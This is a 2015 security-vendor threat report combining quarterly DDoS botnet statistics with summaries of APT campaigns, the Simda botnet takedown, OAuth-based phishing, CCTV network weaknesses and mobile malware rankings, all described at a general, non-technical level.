In March, Kaspersky Lab’s experts published the results of their research of APT attacks launched by a cybercriminals’ group dubbed Animal Farm. The cybercriminals used a number of malicious components, each one performing a specific task. One of these components was the Trojan NBot, which is designed to arrange a botnet and has the functional capability to carry out DDoS attacks. NBoT maintains a large number of distributed attack scenarios – this is evidence that the botnet has been arranged by the cybercriminals to launch large-scale DDoS attacks.

Another way to boost the power of a DDoS attack

Some scenarios rely on the exploitation of shortfalls in the configurations of various network services. These scenarios have already established their position in the repertory of techniques used by botnet owners. In Q2 2015, researchers identified another trick for boosting the power of a DDoS attack – exploiting the shortcomings in the configuration of software implementations of the multicast Domain Name System (mDNS) protocol. Under certain conditions, a service using the mDNS protocol may return a response much greater in size than the query. Thus, botnet owners can send a specially crafted query to such services, and the services would redirect it to the victim user in a much greater quantity.

The “Great Cannon”

The “Great Cannon” is a technology that was used to carry out the DDoS attack on GitHub. On 6 March, the owners of the website GreatFire.org noticed that their servers had become the target of a DDoS attack. The GitHub owners acknowledged it was a powerful DDoS attack from the servers of the search engine Baidu.

The administration of the search engine ruled out the possibility that their servers were compromised. This occasioned researchers to contemplate an attack scenario involving the use of the resources of the Great Firewall of China. This firewall was presumably used as a tool with which to implement a man-in-the-middle (MitM) attack, and redirected Chinese visitors to the attacked web resource.

This incident is yet another demonstration that not only a botnet, but just a great number of unwitting users may be the source of DDoS attacks.

A botnet made of routers

In Q2, a botnet was detected that was made of home and small-business routers – cybercriminals used it to launch DDoS attacks.

Infecting home routers is not a new technique, it is often used by cybercriminals. Ensuring the security of home communications equipment has so far remained the responsibility of its manufacturer. As practice shows, a considerable number of vulnerabilities and configuration shortcomings exist, allowing cybercriminals to seize control over routers. In this incident, the bad guys used the victim routers to launch DDoS attacks.

For cybercriminals, the option of creating botnets made of routers looks quite attractive. For these devices, it is simple to implement automated tools with which to exploit vulnerabilities; this makes the cybercriminals’ task substantially easier. In addition, very few users turn their routers off, so devices that are always on help build larger bots with members that are online pretty much all of the time.

Statistics of botnet-assisted DDoS attacks Methodology

This report presents statistics collected by DDoS Intelligence (part of the solution Kaspersky DDoS Protection) from 1 April to 31 June 2015 (or Q2 2015), which are analyzed in comparison with the equivalent data collected within the previous 3-month period (Q1 2015).

The DDoS Intelligence system is designed to intercept and analyze the commands to bots from command and control (C&C) servers. For its operation, it does not require any user device to get infected, or cybercriminal commands to be in fact executed.

In this report, a single (separate) DDoS attack is defined as an incident during which there was no break in botnet activity lasting longer than 24 hours. Thus, if the same web resource was attacked by the same botnet after a 24-hour gap that would be regarded as two separate DDoS attacks. Attacks on the same web resource from two different botnets are also regarded as individual attacks.

The geographical distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are only one of the tools used to carry out DDoS attacks; thus, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q2 Summary
  • In Q2 2015, botnet-assisted DDoS attacks targeted victims in 79 countries across the world.
  • 77% of botnet-assisted attacks targeted resources located in 10 countries.
  • The largest numbers of DDoS attacks targeted victims in China and the USA. South Korea has risen to the third place.
  • The longest DDoS attack in Q2 2015 lasted for 205 hours (or 8.5 days).
  • SYN DDoS and TCP DDoS and were the most common scenarios of DDoS attacks. HTTP DDoS was displaced to the third position.
Geography of attacks

In Q2, the geography of attacked targets has somewhat expanded as compared to Q1: attacked targets were located in 79 countries around the world (against 76 countries in Q1 2015). 71.9% of attacked resources were located in 10 countries.

Distribution of unique DDoS attack targets by country, Q2 vs Q1 2015

The list of TOP 10 countries has changed only slightly (Croatia has joined, the Netherlands has left). As before, China (29.9%) and the USA (17.2%) lead the ranking; and South Korea (9.8%) has risen from the sixth to the third place, displacing Canada.

If we look at the number of reported attacks, 77.6% of all attacks had targets within the same TOP 10 countries:

Distribution of DDoS attack by countries, Q2 vs Q1 2015

This ranking is also led by China (35.3%) and the USA (17.4%).

As seen in the above charts, China has lost some of its presence in both rankings against Q1; but the shares of the USA and South Korea have increased.

Most of the world’s web resources are located in the USA and China – where there is cheap web hosting available. This explains their long-standing leadership in the rankings in terms of attack counts and the number of attacked targets.

In Q2 we observed a surge in the activity of several families of bots – they mostly attacked targets in South Korea. As a result, this country has risen to the third place in both rankings.

It is also worth mentioning that Russia and Canada have experienced lower percentages in Q2. This is especially noticeable if we look at the percentage of all attacks that targeted these two countries.

Changes in DDoS attack numbers

There was a dramatic rise in the number of DDoS attacks in the first week of May; the low was in late June.

The peak number of attacks in one day was 1960, which were recorded on 7 May. The low was on 25 June, which saw only 73 attacks.

Number of DDoS attacks over time* in Q2 2015.

*DDoS attacks may last for several days. In this plot, the same attack may be counted several times, i.e. one time for each day of its duration.

In Q2 2015, Sunday became the most active day of the week in terms of DDoS attack numbers – 16.6% of all attacks occurred on a Sunday. The lowest number of attacks were reported on Tuesdays.

Distribution of DDoS attack numbers by days of the week

On Sunday 3 May, we observed a sudden surge in the activity of one of the botnets. This suggests that on that day, the cybercriminals were possibly testing their botnet.

Types and duration of DDoS attacks

The effect of a DDoS attack is determined by its duration and scenario – these two elements define the scope of damage inflicted on the target.

In Q2 2015, 98.2% of DDoS targets (vs. 93.2% in Q1) were attacked by bots belonging to one family. In only in 1.7% of all cases the cybercriminals launched attacks using bots belonging to two different families (or the clients used the services of several attack agents). In 0.1% cases, three or more bots were used (respectively 6.2% and 0.6% in Q1).

In Q2 2015, SYN DDoS (50.3%) has remained the most popular attack method. TCP DDoS (21.2%) has returned to the second position in the ranking, displacing HTTP DDOS (13.8%).

The distribution of DDoS attacks by types

Most attacks in Q2 2015 lasted no longer than 24 hours. However, there were some attacks that lasted a week or even longer.

The distribution of DDoS attacks by duration (hours)

The longest DDoS attack in Q2 2015 lasted for 205 hours (8.5 days).

Command and control servers and botnet types

In Q2 2015, South Korea (34%) spurted into the lead in terms of the number of C&C servers located in its territory, leaving behind the USA (21%), China (14%) and the United Kingdom (7%). This was accompanied by a dramatic increase in the number of attacks and targets located in South Korea.

Distribution of botnet C&C servers by countries in Q2 2015

In Q2 2015, there was a dramatic growth in the number of attacks launched from bots for Windows computers. The activity of Windows bots has significantly surpassed that of Linux bots.

The ratio of the number of attacks launched from Windows and Linux botnets

The balance between the activities of Linux and Windows botnets changes all the time, since each botnet type has its advantages and disadvantages in the eyes of cybercriminals.

Linux-based botnets offer cybercriminals the opportunity to manipulate network protocols, while infected servers have high-speed Internet channels (so attacks launched from them are potentially more powerful than those from Windows botnets). However, to create and operate a Linux botnet, a cybercriminal needs to have a good knowledge of Linux as well as find a suitable bot on the black market or in free access.

Windows bots are widely available both on the black market and in free access; they are marketed using tried-and-true tools. On the other hand, malware protection is also well developed on PCs (unlike on infected Linux servers, which typically lack any security whatsoever), so botnets don’t typically live long on infected PCs.

Thus, it is easier and cheaper to use Windows bots but such a botnet does not typically last long. When there are many Windows botnets, their total attacking capacity exceeds that of infected Linux servers.

Complex attacks

The clients ordering DDoS attacks on large organizations are typically ready to pay well to see their goal achieved, so such attacks are well organized and technically complex.

While repelling one attack, Kaspersky DDoS Protection experts identified four methods employed by the attackers:

  1. A powerful NTP amplification;
  2. SSDP amplification – a relatively recent method but gaining in popularity;
  3. SYN flood;
  4. HTTP flood.

All these methods were used simultaneously and targeted several infrastructure components:

  • NPT amplification and SSDP amplification attacks cause overloading of data communication channels with spurious traffic.
  • SYN flood attacks target the infrastructure, create high load on firewalls and exhaust the resources of the operating system.
  • HTTP flood most efficiently affects the target web server by creating a surge of requests, responding to which induces the web server to draw on a lot of hardware resources.

Should any of these components have achieved their goal, the attack would have been successful. If that had happened, the targeted organization would have suffered dramatic financial and serious reputational losses. However, it took the attackerss 20 minutes to convince themselves that the target was reliably protected, after which they the ceased the attack.

That was the most powerful of all attacks that KDP experts came across in Q2 – its peak capacity was 92 Gbit/sec. Such powerful attacks pose a threat not only to specific web resources but also to the data centers hosting them and to the infrastructures of Internet service providers, since the communication channels of upstream providers and data centers may become exhausted before the Internet channel of the actual web resource.

Conclusion

In Q2 2015, more than 77% of botnet-assisted attacks targeted web resources in ten countries across the world. The top two countries in the ranking – China and the USA – have retained their positions. The monitoring system has recorded a surge in the activity of several bot families whose targets were mostly located in South Korea – this explains the third position in the ranking this country takes in Q2.

Let us focus on the technologies carrying out these attacks. Cybercriminals who create DDoS botnets, along with creating regular botnets consisting of PCs and servers, also invest into creating botnets made of network devices – most typically routers and DSL modems. Obviously, the expansion of IoT devices and the current situation around their security adds extra impetus to the development of this type of botnet.

Cybercriminals continue to exhibit a growing persistence in carrying out DDoS attacks. In Q2, attacks lasting up to 8.5 days were observed. That said, even one short-term attack may inflict serious damage to a business both in terms of direct financial loss and reputational loss.

DDoS attacks often serve as a camouflage for a targeted attack, which could result in leaks of important data or stolen money. The DDoS module detected by Kaspersky Lab’s experts is part of the toolkit employed by the cybercriminal group Animal Farm; once again demonstrating the fact that DDoS attacks are an effective tool for cybercriminals.

All kinds of organizations become targets of DDoS attacks. Customers protecting themselves with the services of Kaspersky DDoS Protection experts include: state organizations, large financial companies and banks, mass media, small and medium businesses and even education institutions.

To protect an organization reliably from this type of threat, the organization needs to consider its defense strategy and tactics, take all required actions, and subscribe to a junk traffic filtration service. Bear in mind that when an attack starts, it will be much more difficult to escape the losses.

IT threat evolution Q2 2015

Thu, 07/30/2015 - 07:54

Q2 in figures
  • According to KSN data, Kaspersky Lab solutions detected and repelled a total of 379,972,834 malicious attacks from online resources located all over the world.
  • Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
  • 65,034,577 unique URLs were recognized as malicious by web antivirus components.
  • 51% of web attacks neutralized by Kaspersky Lab products were carried out using malicious web resources located in Russia.
  • There were 5,903,377 registered notifications about attempted malware infections aiming at stealing money via online access to bank accounts.
  • Kaspersky Lab’s file antivirus detected a total of 110,731,713 unique malicious and potentially unwanted objects.
  • Kaspersky Lab mobile security products detected
    • 1,048,129 installation packages;
    • 291,887 new malicious mobile programs;
    • 630 mobile banker Trojans.
Overview Targeted attacks and malware campaigns Monkey business

Recently we published our analysis of CozyDuke, yet another cyber-espionage APT from the ‘Duke’ family – which also includes MiniDuke, CosmicDuke and OnionDuke. CozyDuke (also known as ‘CozyBear’, ‘CozyCar’ and ‘Office Monkeys’) targets government organisations and businesses in the US, Germany, South Korea and Uzbekistan.

The attack implements a number of sophisticated techniques, including encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family.

However, one of CozyDuke’s most notable features is its use of social engineering to get an initial foothold in targeted organisations. Some of the attackers’ spear-phishing emails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as email attachments. A notable example (which also gives the malware one of its names) is ‘OfficeMonkeys LOL Video.zip’. When run, this drops a CozyDuke executable on to the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers.

It is necessary to make staff education a core component of any business security strategy #KLReport

Tweet

The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.

Naikon: gathering geo-political intelligence

In May we published our report on the Naikon APT. Naikon is used in campaigns against sensitive targets in South-eastern Asia and around the South China Sea. The attackers seem to be Chinese-speaking and have been active for at least five years, focusing their attention on top-level government agencies and civil and military organizations in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China.

As with so many campaigns of this kind, the attackers use spear-phishing emails to trick unsuspecting staff into loading the malware. Emails include an attached file containing information likely to be of interest to the victim. The file seems to be a standard Word document, but it is really an executable with a double extension, or an executable that uses the RTLO (right to left override) mechanism to mask the real extension of the file. If the victim clicks on the file, it installs spyware on the computer while displaying a decoy document to avoid arousing suspicion.

The attackers use spear-phishing emails to trick staff into loading malware #KLReport

Tweet

Naikon’s main module is a remote administration tool: this module supports 48 commands to exercise control over infected computers. These include commands to take a complete inventory, download and upload data, and install add-on modules. In addition, Naikon sometimes uses keyloggers to obtain employees’ credentials.

Each target country is assigned its own operator, who is able to take advantage of local cultural features – for example, the tendency to use personal email accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer data to the attackers’ Command-and-Control (C2) servers.

You can find our main report and follow-up report on our web site.

Spying on the spies

While researching Naikon, we uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia – most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US.

In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The target of the email questioned the authenticity of the email with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an email back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities.

Hellsing found itself on under a spear-phishing attack by the Naikon APT group – and struck back #KLReport

Tweet

In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an ATP-on-APT attack is unusual.

Grabit and run

Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of the attackers. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. Every business is a potential target – for its own assets, or as a way of infiltrating another organisation.

The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files.

The malware is delivered in the form of a Word document attached to an email. The document contains a malicious macro named ‘AutoOpen’. This macro opens a socket over TCP and sends an HTTP request to a remote server that was hacked by the group to serve as a malware hub. Then the program used to carry out the spying operation is downloaded from this server. In some cases, the macro is password protected (the attackers seem to have forgotten that a DOC file is actually an archive; and when it’s opened in an editor, macro strings are shown in clear-text). The attackers control compromised computers using a commercial spying tool called HawkEye (from HawkEyeProducts). In addition, they use a number of Remote Administration Tools (RATs).

The attackers have implemented some techniques designed to make Grabit hard to analyze,, including variable code sizes, code obfuscation and encryption. On the other hand, they fail to cover their tracks in the system. The result is a ‘weak knight in heavy armor’, suggesting that the attackers didn’t write all the code themselves.

The return of Duqu

In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0′.

The malware platform was designed to survive almost exclusively in the memory of infected systems. #KLReport

Tweet

In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes.

However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal. The attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau.

One of Duqu 2.0’s most notable features was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that he attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was re-booted and the malware was cleared from memory.

The Duqu 2.0 technical paper and analysis of the persistence module can be found on our web site.

Malware stories Simda’s hide-and-seek malware business

In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed 190 countries that had been affected by the botnet.

Preliminary analysis revealed 190 countries that had been affected by the Simda botnet. #KLReport

Tweet

The bots are distributed via a series of infected web sites that re-direct visitors to exploit kits. The bots download and run additional components from their own update servers and are able to modify the hosts file on the infected computer: in this way, once-infected computers can keep sending out HTTP requests to the malicious servers, indicating that they are still vulnerable to re-infection using the same exploit kits.

Although the Simda botnet is relatively large, with an estimated 770,000 infected computers, the authors went to great lengths to try and make it ‘fly under the radar’ of anti-malware systems. The malware is able to detect emulation, security tools and virtual machines; it uses a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network; and it implements server-side polymorphism.

Simda also de-activates itself after a short time. This is closely related to the purpose of this particular botnet: it’s a delivery mechanism, designed to disseminate potentially unwanted and malicious software. The distributors wanted to guarantee that only their client’s malware would be installed on infected computers.

Kaspersky Lab products currently detect hundreds of thousands of modifications of Simda, together with many different third-party malicious programs distributed using the Simda botnet. You can use our free Simda bot IP scanner to check if your IP has connected to a Simda C2 server in the past.

Phishing, but not as we know it

Early in 2014 a serious vulnerability in the OAuth and OpenID protocols was discovered by Wang Jing, a PHD student at the Nanyang Technological University in Singapore. He found what he named the ‘covert redirect’ vulnerability, which could allow an attacker to steal data following authentication (a summary of the problem, including a link to Jing’s blog, can be found on Threatpost).

Recently, we discovered a phishing campaign that takes advantage of the OAuth vulnerability. OAuth lets customers of online services give third parties limited access to their protected resources without sharing their credentials. It is commonly used by applications for social networks – for example, to obtain access to someone’s contact lists or other data.

The Kaspersky Lab customer who reported the attack received an email saying that someone had used their Windows Live ID and asking them to follow a link to the Windows Live site and follow the security requirements outlined there.

Do not allow untrusted applications to access your data #KLReport

Tweet

On the face of it, it seems like a standard phishing technique – one that would result in the victim being re-directed to a fake site. But in this case, the link led to the legitimate site. The victim’s login credentials aren’t stolen and they are logged in to the legitimate site. However, after authorization, the victim receives a request for a range of permissions from an unknown application. This can include automatic login, access to profile information, contact list and email addresses. If the victims hands over these rights, it offers the cybercriminals access to their personal information – information that they can use to distribute spam, phishing links or for other fraudulent purposes.

We would recommend the following to safeguard your personal data.

  • Do not click on links you receive by email or in messages on social networks.
  • Do not allow untrusted applications to access your data.
  • Before you agree to such requests, carefully read the description of the access rights being requested by an application
  • Read reviews and feedback on the application on the Internet.
  • Review the rights of currently installed applications and modify the settings if you need to.
Smart cities but not-so-smart security

The use of CCTV systems by governments and law enforcement agencies for surveilling public places has grown enormously in recent years. Most of us accept them as a reasonable trade-off between privacy and security. However, this rather assumes that the data gathered using this technology will be handled securely and responsibly, to ensure that the benefits aren’t outweighed by any potential dangers.

Many CCTV cameras have a wireless connection to the Internet, enabling police to monitor them remotely. However, this is not necessarily secure: it’s possible for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site).

Aspects of life are being made digital & security should be considered as part of the design stage #KLReport

Tweet

The researchers started by looking at the surveillance equipment in locations across the city. Unfortunately, there had been no attempt to mask the branding of the cameras, so it was easy to determine the makes and models of the cameras, examine the relevant specs and create their own scale model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so that an attacker would be able to create their own version of the software and manipulate data travelling across it.

It’s important to note that they did not attempt to hack into the real network, but analyzed the hardware and communication protocols and built a scale model. The network topology of the surveillance camera network is unlike a standard home wireless network. On a home network, all devices connect to the Internet and one another through a router. Any device connected to that router could potentially trick the other devices into thinking it’s the router and monitor or change data by performing a Man-in-the-Middle attack.

The surveillance camera network is more complicated, because of the distances the data needs to travel. The data must travel from any given camera through a series of nodes eventually leading back to a hub (in a real world implementation, this might be a police station). The traffic follows the path of least resistance where each node has the ability to communicate with several others and selects the easiest path back to the hub.

Hioureas and Kinsey built a series of fake nodes that purported to offer a direct line of communication to a simulated police station. Since they knew all the protocols used on the network, they were able to create a Man-in-the-Middle node that seemed to offer the path of least resistance, causing the real nodes to relay their traffic through their malicious node.

One potential use for attackers would be to spoof footage sent to a police station. This could make it appear as if there was an incident in one location, thereby distracting police from a real attack occurring elsewhere in the city.

The researchers reported these issues to the authorities responsible for the city surveillance systems concerned and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in these networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and that footage is encrypted as it travels through the network.

The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered as part of the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind.

Statistics

All the statistics used in this report were obtained using the Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Mobile banker Trojans still remain among the top mobile threats. In our Q1 2015 report, we mentioned Trojan-SMS.AndroidOS.OpFake.cc, which could attack at least 29 banking and financial applications. The latest version of this Trojan can now attack 114 banking and financial applications. Its main goal is to steal the user’s online credentials. Serving the same purpose, it also attacks several popular email applications.

Trojan-Spy.AndroidOS.SmsThief.fc also deserves a mention. Cybercriminals managed to add their code into the original banking application without affecting its operation, making this Trojan more difficult to detect.

The latest version of Trojan-SMS.AndroidOS.Opfake.cc can now attack 114 banking and financial applications. #KLReport

Tweet

A new iOS Trojan, Trojan.IphoneOS.FakeTimer.a, emerged in Q2. It is interesting in that it is an iOS version of a malicious Android app which emerged several years ago. FakeTimer.a attacks even non-jailbroken devices. Its payload is rather primitive: it is a regular phishing application created to steal money from Japanese users.

In Q2, Trojans which can use root privileges to display advertisements to users or install advertising applications became especially visible. A total of six such malicious programs landed in the Q2 TOP 20 of malicious malware.

The number of new mobile threats

In Q2 2015, Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs, a 2.8-fold increase on Q1 2015.

Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs #KLReport

Tweet

The number of installation packages detected was 1,048,129 – this is seven times as many as in the previous quarter.

Number of malicious installation packages and new malicious mobile programs detected (Q4 2014 – Q2 2015)

Distribution of mobile malware by type

Distribution of new mobile malware by type, Q2 2015

The ranking of malware objects for mobile devices for the second quarter of 2015 was headed by RiskTool (44.6%). These are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses.

Potentially unwanted advertising apps came second with 19%.

SMS Trojans have previously led this ranking, but in Q2 they were only in the fourth place with 8.1% – this is 12.9% lower than in Q1. The lower share taken by these malicious programs is in part accounted for by the fact that those who were previously active distributing SMS Trojans have started using ‘cleaner’ monetization techniques (as testified by the increased RiskTool shares), or prefer to use other types of malware. Thus the Trojan share increased from 9.8% in Q1 to 12.4% in Q2.

Top 20 malicious mobile programs

Please note that, starting from this quarterly report, we are publishing the ranking of malicious programs, which does not include potentially dangerous or unwanted programs such as RiskTool or adware.

  Name % of attacks * 1 DangerousObject.Multi.Generic 17.5% 2 Trojan-SMS.AndroidOS.Podec.a 9.7% 3 Trojan-SMS.AndroidOS.Opfake.a 8.0% 4 Backdoor.AndroidOS.Obad.f 7.3% 5 Trojan-Downloader.AndroidOS.Leech.a 7.2% 6 Exploit.AndroidOS.Lotoor.be 5.7% 7 Trojan-Spy.AndroidOS.Agent.el 5.5% 8 Trojan.AndroidOS.Ztorg.a 3.1% 9 Trojan.AndroidOS.Rootnik.a 3.0% 10 Trojan-Dropper.AndroidOS.Gorpo.a 2.9% 11 Trojan.AndroidOS.Fadeb.a 2.7% 12 Trojan-SMS.AndroidOS.Gudex.e 2.5% 13 Trojan-SMS.AndroidOS.Stealer.a 2.5% 14 Exploit.AndroidOS.Lotoor.a 2.1% 15 Trojan-SMS.AndroidOS.Opfake.bo 1.6% 16 Trojan.AndroidOS.Ztorg.b 1.6% 17 Trojan.AndroidOS.Mobtes.b 1.6% 18 Trojan-SMS.AndroidOS.FakeInst.fz 1.6% 19 Trojan.AndroidOS.Ztorg.pac 1.5% 20 Trojan-SMS.AndroidOS.FakeInst.hb 1.4%

* Percentage of users attacked by the malware in question, relative to all users attacked

The top position in the rankings was occupied by DangerousObject.Multi.Generic (17.5%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats.

Trojan-SMS.AndroidOS.Podec.a (9.7%) has been among the Top Three malicious mobile programs for three quarters in a row due to its active dissemination.

Trojan-SMS.AndroidOS.Opfake.a (8.0%) has been quickly rising to the top lines of the ranking. While in Q3 2014 it was in the 11th place only,it is now in the TOP 3 of mobile malware. Obfake.bo, another representative of this malware family, is in 15th place.

It is also worth mentioning the appearance of Backdoor.AndroidOS.Obad in the TOP 20 ranking – in fact, it jumped to fourth place all at once. This is a multi-functional Trojan, capable of sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. We wrote about it two years ago, and its capabilities have remained virtually unchanged ever since.

Another interesting thing is that although this ranking does not include adware programs, six of the TOP 20 malicious mobile programs use advertisements as the main vehicle of monetization. Unlike regular advertisement modules, Trojan.AndroidOS.Rootnik.a, three programs of the Trojan.AndroidOS.Ztorg family, Trojan-Downloader.AndroidOS.Leech.a and Trojan.AndroidOS.Fadeb.a do not carry any productive payload with them. Their goal is to deliver to the user as much advertising as possible in various ways, including installation of new adware programs. These Trojans can use root privileges to conceal themselves in the system folder – this makes it very difficult to delete them.

Mobile banker Trojans

In Q2 2015, we detected 630 mobile banker Trojans. It should be noted that the number of new malware programs belonging to this category is now growing at a much slower rate.

Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q3 2014 – Q2 2015)

Geography of mobile banking threats in Q2 2015
(number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked):

  Country* % of users attacked by mobile bankers** 1 Republic of Korea 2.37% 2 Russia 0.87% 3 Uzbekistan 0.36% 4 Belarus 0.30% 5 Ukraine 0.29% 6 China 0.25% 7 Kazakhstan 0.17% 8 Australia 0.14% 9 Sweden 0.13% 10 Austria 0.12%

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country

Mobile bankers proliferate most actively in Korea. Cybercriminals are also historically active in Russia and other post-Soviet countries. It is some of these countries that occupy four out of five positions in the ranking.

An indication of how popular mobile banker Trojans are with cybercriminals in each country, may be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the reported three month period, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking is different from the one above:

TOP 10 countries by the percentage of users attacked by mobile bankers relative to all attacked users

  Country * % of users attacked by mobile bankers, relative to all attacked users * 1 Republic of Korea 31.72% 2 Russia 10.35% 3 Australia 6.62% 4 Austria 6.03% 5 Japan 4.73% 6 Uzbekistan 4.17% 7 Belarus 3.72% 8 Ecuador 3.50% 9 Ukraine 3.46% 10 Switzerland 3.09%

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country

In Korea, almost one third of all users attacked by mobile malware were attacked by mobile bankers in particular. In Russia, every tenth attacked user came under a mobile banker attack. In other countries, this percentage is lower. Interestingly, there are four countries in this TOP 10 which are also in the TOP 5 of most secure counties with the lowest probability of mobile malware infection – these are Australia, Austria, Japan and Switzerland.

The geography of mobile threats

The geography of mobile malware infection attempts in Q2 2015
(percentage of all users attacked)

Top 10 countries attacked by mobile malware:

  Country* % of users attacked** 1 China 16.34% 2 Malaysia 12.65% 3 Nigeria 11.48% 4 Bangladesh 10.89% 5 Tanzania 9.66% 6 Algeria 9.33% 7 Uzbekistan 8.56% 8 Russia 8.51% 9 Ukraine 8.39% 10 Belarus 8.05%

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country

This ranking is led by China, where 16.34% of all users of Kaspersky Lab’s product were attacked at least once during the three month period. Malaysia is in second place with 12.65%. Russia (8.51%), Ukraine (8.39%) and Belarus (8.05%) close the TOP 10 ranking, below some Asian and African countries.

Korea took 11th place in this ranking with 7.46%. Let us remind the reader that mobile banker Trojans are very popular with the Korean cybercriminals: 31.72% of all users attacked by mobile malware were the victim of a mobile banking Trojan attack.

The most secure countries in this respect are:

  Country % of users attacked 1 Japan 1.06% 2 Canada 1.82% 3 Austria 1.96% 4 Australia 2.16% 5 Switzerland 2.19% Vulnerable applications used by fraudsters

The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.

Distribution of exploits used in attacks by type of application attacked, Q2 2015

